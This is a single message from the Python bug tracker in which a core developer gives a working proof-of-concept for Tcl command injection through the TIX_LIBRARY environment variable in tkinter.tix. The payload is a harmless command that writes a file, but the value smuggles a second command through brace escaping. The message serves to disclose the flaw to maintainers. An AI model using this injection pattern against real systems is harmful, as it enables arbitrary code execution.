Message 285479 - Python tracker

➜

This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author	serhiy.storchaka
Recipients	benjamin.peterson, christian.heimes, larry, ned.deily, serhiy.storchaka, symphorien, terry.reedy, zach.ware
Date	2017-01-14.12:57:45
SpamBayes Score	-1.0
Marked as misclassified	Yes
Message-id	<1484398665.94.0.146711673799.issue29125@psf.upfronthosting.co.za>
In-reply-to

Content
TclError in Terry's example is raised because Tcl script has unpaired braces. You should add "{" at the end of TIX_LIBRARY. Here is working exploit: $ TIX_LIBRARY="/dev/null}; exec python3 -m this >spoiled; set x {" python3 -c "from tkinter.tix import Tk; Tk()" It creates the file "spoiled" in current directory containing The Zen of Python.

TclError in Terry's example is raised because Tcl script has unpaired braces. You should add "{" at the end of TIX_LIBRARY.

Here is working exploit:

$ TIX_LIBRARY="/dev/null}; exec python3 -m this >spoiled; set x {"  python3 -c "from tkinter.tix import Tk; Tk()"

It creates the file "spoiled" in current directory containing The Zen of Python.

History
Date	User	Action	Args
2017-01-14 12:57:45	serhiy.storchaka	set	recipients: + serhiy.storchaka, terry.reedy, larry, christian.heimes, benjamin.peterson, ned.deily, zach.ware, symphorien
2017-01-14 12:57:45	serhiy.storchaka	set	messageid: <1484398665.94.0.146711673799.issue29125@psf.upfronthosting.co.za>
2017-01-14 12:57:45	serhiy.storchaka	link	issue29125 messages
2017-01-14 12:57:45	serhiy.storchaka	create